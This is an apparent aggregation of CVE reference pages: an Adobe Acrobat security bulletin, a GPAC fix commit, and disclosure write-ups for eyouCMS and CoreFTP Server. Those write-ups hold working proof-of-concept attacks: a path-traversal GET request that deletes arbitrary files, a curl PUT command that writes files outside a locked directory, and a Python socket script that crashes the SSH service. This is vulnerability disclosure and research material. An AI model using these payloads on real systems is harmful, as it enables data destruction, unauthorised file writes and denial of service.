For questions regarding Acrobat DC, please visit the Acrobat DC FAQ page. 

**Solution**

Adobe recommends users update their software installations to the latest versions by following the instructions below.    

The latest product versions are available to end users via one of the following methods:    

*   Users can update their product installations manually by choosing Help > Check for Updates.     
    
*   The products will update automatically, without requiring user intervention, when updates are detected.      
    
*   The full Acrobat Reader installer can be downloaded from the Acrobat Reader Download Center.     
    

For IT administrators (managed environments):     

*   Refer to the specific release note version for links to installers.     
    
*   Install updates via your preferred methodology, such as AIP-GPO, bootstrapper, SCUP/SCCM (Windows), or on macOS, Apple Remote Desktop and SSH.     
    

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version:    

**Product**

**Track**

**Updated Versions**

**Platform**

**Priority Rating**

**Availability**

Acrobat DC

Continuous

21.011.20039  

Windows and macOS

2

Release Notes     

Acrobat Reader DC

Continuous

21.011.20039  

Windows and macOS

2

Release Notes     

Acrobat 2020  

Classic 2020             

20.004.30020  

Windows and macOS       

2

Release Notes     

Acrobat Reader 2020  

Classic 2020             

20.004.30020  

Windows and macOS       

2

Release Notes     

Acrobat 2017

Classic 2017

17.011.30207  

Windows and macOS

2

Release Notes     

Acrobat Reader 2017

Classic 2017

17.011.30207  

Windows and macOS

2

Release Notes     

**Vulnerability Details**

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

**CVSS base score**

CVSS vector

**CVE Number**

Use After Free (CWE-416)

Arbitrary code execution 

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44701

Information Exposure (CWE-200)  

Privilege escalation

Moderate

3.1

CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N  

CVE-2021-44702

Stack-based Buffer Overflow (CWE-121)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44703

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44704

Access of Uninitialized Pointer (CWE-824)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44705

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44706

Out-of-bounds Write (CWE-787)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44707

Heap-based Buffer Overflow (CWE-122)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44708

Heap-based Buffer Overflow (CWE-122)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44709

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44710

Integer Overflow or Wraparound (CWE-190)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44711

Improper Input Validation (CWE-20)

Application denial-of-service

Important

4.4

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L

CVE-2021-44712

Use After Free (CWE-416)

Application denial-of-service

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

CVE-2021-44713

Violation of Secure Design Principles (CWE-657)

Security feature bypass

Moderate

2.5

CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N

CVE-2021-44714

Out-of-bounds Read (CWE-125)

Memory Leak

Moderate

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

CVE-2021-44715

Information Exposure (CWE-200)  

Privilege escalation  

Moderate

3.1

CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N  

CVE-2021-44739

NULL Pointer Dereference (CWE-476)

Application denial-of-service

Moderate

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

CVE-2021-44740

NULL Pointer Dereference (CWE-476)

Application denial-of-service

Moderate

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

CVE-2021-44741

Out-of-bounds Read (CWE-125)

Memory Leak

Moderate

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

CVE-2021-44742

Out-of-bounds Read (CWE-125)

Arbitrary code execution

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-45060

Out-of-bounds Write (CWE-787)

Arbitrary code execution

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-45061

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-45062

Use After Free (CWE-416)

Privilege escalation

Moderate

3.3

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

CVE-2021-45063

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-45064

Access of Memory Location After End of Buffer (CWE-788)

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

CVE-2021-45067

Out-of-bounds Write (CWE-787)

Arbitrary code execution

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-45068

**Acknowledgements**

Adobe would like to thank the following for reporting these issues and for working with Adobe to help protect our customers:   

*   Ashfaq Ansari and Krishnakant Patil - HackSys Inc working with Trend Micro Zero Day Initiative (CVE-2021-44701)
*   j00sean (j00sean) (CVE-2021-44702, CVE-2021-44739)
*   Kai Lu of Zscaler's ThreatLabz (CVE-2021-44703, CVE-2021-44708, CVE-2021-44709, CVE-2021-44740, CVE-2021-44741)
*   PangU via TianfuCup (CVE-2021-44704)
*   StakLeader via TianfuCup (CVE-2021-44705)
*   bee13oy of Kunlun Lab via TianfuCup (CVE-2021-44706)
*   Vulnerability Research Institute Juvenile Via TianfuCup (CVE-2021-44707)
*   Jaewon Min and Aleksandar Nikolic of Cisco Talos (CVE-2021-44710, CVE-2021-44711)
*   Sanjeev Das (sd001) (CVE-2021-44712)  
    
*   Rocco Calvi (TecR0c) and Steven Seeley of Qihoo 360 (CVE-2021-44713, CVE-2021-44715)
*   chamal (chamal) (CVE-2021-44714)
*   fr0zenrain of Baidu Security (fr0zenrain) (CVE-2021-44742)  
    
*   Anonymous working with Trend Micro Zero Day Initiative (CVE-2021-45060, CVE-2021-45061, CVE-2021-45062, CVE-2021-45063; CVE-2021-45068, CVE-2021-45064)
*   Ashfaq Ansari (ashfaqansari) (CVE-2021-45067)

**Revisions:**

January 12, 2022: Updated acknowledgement for CVE-2021-44706

January 13, 2022: Updated acknowledgement for CVE-2021-45064, Updated CVE details for CVE-2021-44702 and CVE-2021-44739

January 17, 2022: Updated acknowledgement for CVE-2021-44706

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com.

CVE-2021-45061: Adobe Security Bulletin

eyouCMS V1.5.5-UTF8-SP3_1 suffers from Arbitrary file deletion due to insufficient filtering of the parameter filename.

#Author: yukidddd

#Submit date: 07/01/2022  
#Target: https://www.eyoucms.com/  
#Version: V1.5.5-UTF8-SP3\_1 (https://www.eyoucms.com/index.php?m=home&c=Index&a=downdemo)  
#Description:Due to insufficient filtering of the parameter filename, it can cause any file to be deleted  
#PoC:

![WJLsZRc49SQfyYD](https://user-images.githubusercontent.com/17507734/148497117-c7204d08-5c3d-4202-9ff4-86e66ab574f9.png)

1.  Now,content of the root folder of the website is like this,and we created a new test.txt as a test

![image](https://user-images.githubusercontent.com/17507734/148497182-d58b930b-0dc3-45fe-8723-d27760a3490d.png)

2.  Then we log in as a normal user and send the following payload

![image](https://user-images.githubusercontent.com/17507734/148497235-803f9dd3-8594-4a40-bc05-18be8077bbbd.png)

###Request:
GET /index.php?m=user&c=Uploadify&a=del\_local&filenames=/uploads/....//test.txt HTTP/1.1
Host: localhost
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
Accept: application/json, text/javascript, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/?m=user&c=Users&a=index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cookie\_token=b524f68dde14d175a5a29af375704b7361e80aeacf0acedac77a3b397a4a56e9; admin=admin; pass=21232f297a57a5a743894a0e4a801fc3; UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6; home\_lang=cn; admin\_lang=cn; PHPSESSID=t0kq7ujoc9351sj4vl251ra20s; referurl=http%3A%2F%2Flocalhost%2F; users\_id=4
Connection: close

###Response:
HTTP/1.1 200 OK
Server: nginx/1.15.11
Date: Fri, 07 Jan 2022 05:28:07 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/7.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
Set-Cookie: site\_info=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: users\_id=4; path=/
Content-Length: 4

true

3.  And now,the test.txt file has been deleted

![image](https://user-images.githubusercontent.com/17507734/148497286-49d3ad10-3d93-4dcc-9d6a-37d8aa3709a0.png)

CVE-2021-46255: There is an arbitrary file deletion vulnerability in your code · Issue #21 · eyoucms/eyoucms

The binary MP4Box in Gpac 1.0.1 has a double-free vulnerability in the ilst_box_read function in box_code_apple.c, which allows attackers to cause a denial of service, even code execution and escalation of privileges.

Permalink

Browse files

fixed #1895

*   Loading branch information

![@jeanlf](https://avatars.githubusercontent.com/u/7303785?s=40&v=4)

jeanlf committed

Aug 30, 2021

1 parent 86c1566 commit a69b567b8c95c72f9560c873c5ab348be058f340

Showing with **1 addition** and **0 deletions**.

1.  +1 −0 src/odf/descriptors.c

1 src/odf/descriptors.c

Show comments View file

@@ -1613,6 +1613,7 @@ GF\_AV1Config \*gf\_odf\_av1\_cfg\_read\_bs\_size(GF\_BitStream \*bs, u32 size)

size -= (u32) obu\_size;

}

gf\_av1\_reset\_state(& state, GF\_TRUE);

gf\_bs\_align(bs);

return cfg;

#else

return NULL;

**0 comments on commit `a69b567`**

Please sign in to comment.

CVE-2021-40571: fixed #1895 · gpac/gpac@a69b567

CoreFTP Server before 727 allows directory traversal (for file creation) by an authenticated attacker via ../ in an HTTP PUT request.

![](https://yoursecuritybores.me/content/images/2022/01/CoreFTP-setup-1.png)

**Overview**

The following was found on Core FTP/SFTP Server v2 - Build 725 (64-bit). The following vulnerabilities can be exploited remotely, however one  requires authentication. Although, if anonymous logon is enabled then exploitation of this would be considered unauthenticated. Shodan clocked in ~2,000 publicly available servers. A patch has been released and you can check on their forums to see that the new build version is 727!

![](https://yoursecuritybores.me/content/images/2022/01/image.png)

**Proof of Concept - Arbitrary File Write (HTTPS)**

The application has several different options, so I tried to make it as "real world" as possible. The following was the least amount of access I could set permission. This being that the users home directory is locked to `C:\Temp` locally.

![](https://yoursecuritybores.me/content/images/2021/12/lock.PNG)

Permissions set on the home directory is given access to read and list.

![](https://yoursecuritybores.me/content/images/2021/12/perms.PNG)

With the server started up, an authenticated user can upload files through the HTTPS service with basic authentication. The normal use case for an HTTP file upload is a `POST` request with basic `WebKitFormBoundary` with the file data. Example below;

    POST /?T HTTP/1.1
    Host: 192.168.171.138
    Content-Length: 218
    Cache-Control: max-age=0
    Authorization: Basic am9lOmpvZQ==
    Upgrade-Insecure-Requests: 1
    Origin: https://192.168.171.138
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiULcJSomxAyFsnjd
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: https://192.168.171.138/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    ------WebKitFormBoundaryiULcJSomxAyFsnjd
    Content-Disposition: form-data; name="uploadfile"; filename="random.dat"
    Content-Type: application/octet-stream
    
    Random Data 
    
    ------WebKitFormBoundaryiULcJSomxAyFsnjd--
    

To exploit this vulnerability, escape from the permission lock simply using a `PUT` HTTP verb with a `../` escape sequence. The following `curl` command will successfully bypass the lock permissions;

    curl -k -X PUT -H "Host: <IP>" --basic -u <username>:<password> --data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops
    

More readable format;

    PUT /../whoops HTTP/1.1
    Host: 192.168.171.138
    Content-Length: 4
    Cache-Control: max-age=0
    Authorization: Basic am9lOmpvZQ==
    Upgrade-Insecure-Requests: 1
    Origin: https://192.168.171.138
    Referer: https://192.168.171.138/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    PoC.
    

Notice that the file has been placed outside the locked permission set.

**Proof of Concept - Remote DoS (SSH)**

The next vulnerability was an overflow in the implementation of the SSH Service. During the secure algorithm negotiation, if the client provides an oversized second step, the application will crash.

    import socket
    import codecs
    packet1 = (
    b"\x53\x53\x48\x2d\x32\x2e\x30\x2d\x4e\x6d\x61\x70\x2d\x53\x53\x48"
    b"\x32\x2d\x48\x6f\x73\x74\x6b\x65\x79\x0d\x0a")
    packet2 = (
    b"\x00\x00\x02\x04\x08\x14\xeb\xcd\xde\x26\x3d\x8d\x72\xd2\x0b\xdb"
    b"\xea\x31\x95\x00\x99\x36\x00\x00\x00\xba\x64\x69\x66\x66\x69\x65"
    b"\x2d\x68\x65\x6c\x6c\x6d\x61\x6e\x2d\x67\x72\x6f\x75\x70\x31\x2d"
    b"\x73\x68\x61\x31\x2c\x64\x69\x66\x66\x69\x65\x2d\x68\x65\x6c\x6c"
    b"\x6d\x61\x6e\x2d\x67\x72\x6f\x75\x70\x31\x34\x2d\x73\x68\x61\x31"
    b"\x2c\x64\x69\x66\x66\x69\x65\x2d\x68\x65\x6c\x6c\x6d\x61\x6e\x2d"
    b"\x67\x72\x6f\x75\x70\x31\x34\x2d\x73\x68\x61\x32\x35\x36\x2c\x64"
    b"\x69\x66\x66\x69\x65\x2d\x68\x65\x6c\x6c\x6d\x61\x6e\x2d\x67\x72"
    b"\x6f\x75\x70\x31\x36\x2d\x73\x68\x61\x35\x31\x32\x2c\x64\x69\x66"
    b"\x66\x69\x65\x2d\x68\x65\x6c\x6c\x6d\x61\x6e\x2d\x67\x72\x6f\x75"
    b"\x70\x2d\x65\x78\x63\x68\x61\x6e\x67\x65\x2d\x73\x68\x61\x31\x2c"
    b"\x64\x69\x66\x66\x69\x65\x2d\x68\x65\x6c\x6c\x6d\x61\x6e\x2d\x67"
    b"\x72\x6f\x75\x70\x2d\x65\x78\x63\x68\x61\x6e\x67\x65\x2d\x73\x68"
    b"\x61\x32\x35\x36\x00\x00\x00\x0b\x73\x73\x68\x2d\x65\x64\x32\x35"
    b"\x35\x31\x39\x00\x00\x00\x57\x61\x65\x73\x31\x32\x38\x2d\x63\x62"
    b"\x63\x2c\x33\x64\x65\x73\x2d\x63\x62\x63\x2c\x62\x6c\x6f\x77\x66"
    b"\x69\x73\x68\x2d\x63\x62\x63\x2c\x61\x65\x73\x31\x39\x32\x2d\x63"
    b"\x62\x63\x2c\x61\x65\x73\x32\x35\x36\x2d\x63\x62\x63\x2c\x61\x65"
    b"\x73\x31\x32\x38\x2d\x63\x74\x72\x2c\x61\x65\x73\x31\x39\x32\x2d"
    b"\x63\x74\x72\x2c\x61\x65\x73\x32\x35\x36\x2d\x63\x74\x72\x00\x00"
    b"\x00\x57\x61\x65\x73\x31\x32\x38\x2d\x63\x62\x63\x2c\x33\x64\x65"
    b"\x73\x2d\x63\x62\x63\x2c\x62\x6c\x6f\x77\x66\x69\x73\x68\x2d\x63"
    b"\x62\x63\x2c\x61\x65\x73\x31\x39\x32\x2d\x63\x62\x63\x2c\x61\x65"
    b"\x73\x32\x35\x36\x2d\x63\x62\x63\x2c\x61\x65\x73\x31\x32\x38\x2d"
    b"\x63\x74\x72\x2c\x61\x65\x73\x31\x39\x32\x2d\x63\x74\x72\x2c\x61"
    b"\x65\x73\x32\x35\x36\x2d\x63\x74\x72\x00\x00\x00\x21\x68\x6d\x61"
    b"\x63\x2d\x6d\x64\x35\x2c\x68\x6d\x61\x63\x2d\x73\x68\x61\x31\x2c"
    b"\x68\x6d\x61\x63\x2d\x72\x69\x70\x65\x6d\x64\x31\x36\x30\x00\x00"
    b"\x00\x21\x68\x6d\x61\x63\x2d\x6d\x64\x35\x2c\x68\x6d\x61\x63\x2d"
    b"\x73\x68\x61\x31\x2c\x68\x6d\x61\x63\x2d\x72\x69\x70\x65\x6d\x64"
    b"\x31\x36\x30\x00\x00\x00\x04\x6e\x6f\x6e\x65\x00\x00\x00\x04\x6e"
    b"\x6f\x6e\x65\x00\x00\x00\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41"
    b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    b"\x41\x41\x41\x41\x41\x41\x41\x41")
    host = ''
    port = 22
    mySocket = socket.socket()
    mySocket.connect((host,port))
    mySocket.send(packet1)
    data = codecs.decode(mySocket.recv(1024))
    print ('Received from server: ' + data)
    mySocket.send(packet2)
    print ('You\'re sending: '+ packet2)
    data = mySocket.recv(1024)
    print ('Received from server: ' + data)
    

Results in the following stack overflow;

![](https://yoursecuritybores.me/content/images/2022/01/overflow.PNG)

**TLDR / Takeaways;**

Some key takeaways and conclusions. First off, CoreFTP team was extremely fast at replying and patching these vulnerabilities and you can update your application so that you're not vulnerable. One thing I noticed after reporting these, CoreFTP seems to have a common theme of DoS vulnerabilities within the TLS implementation for their application, I thought that was kind of interesting.

Secondly, the DoS vulnerability was a pretty short PoC as I just didn't have the time to find the root cause of the vulnerability/ identify the exact point of source code that lead to this. This was a closed boxed research project and the code base is HUGE, trying to reverse it statically was daunting to say the least.

Lastly, this was fun to research, I got to learn about `boofuzz`, and statically reverse with `Binary Ninja Pro`, finally debugged with `WinDBG`. CVE ID's are reported, will update when assigned.

    December 28th, 2021 - Initial Email
    December 29th, 2021 - Response
    Janurary 5th, 2022 - Patched

CVE-2022-22836: CoreFTP Arbitrary File Write(CVE-2022-22836) and Remote DoS

In NetBSD through 9.2, the IPv6 Flow Label generation algorithm employs a weak cryptographic PRNG.

Tag

#apple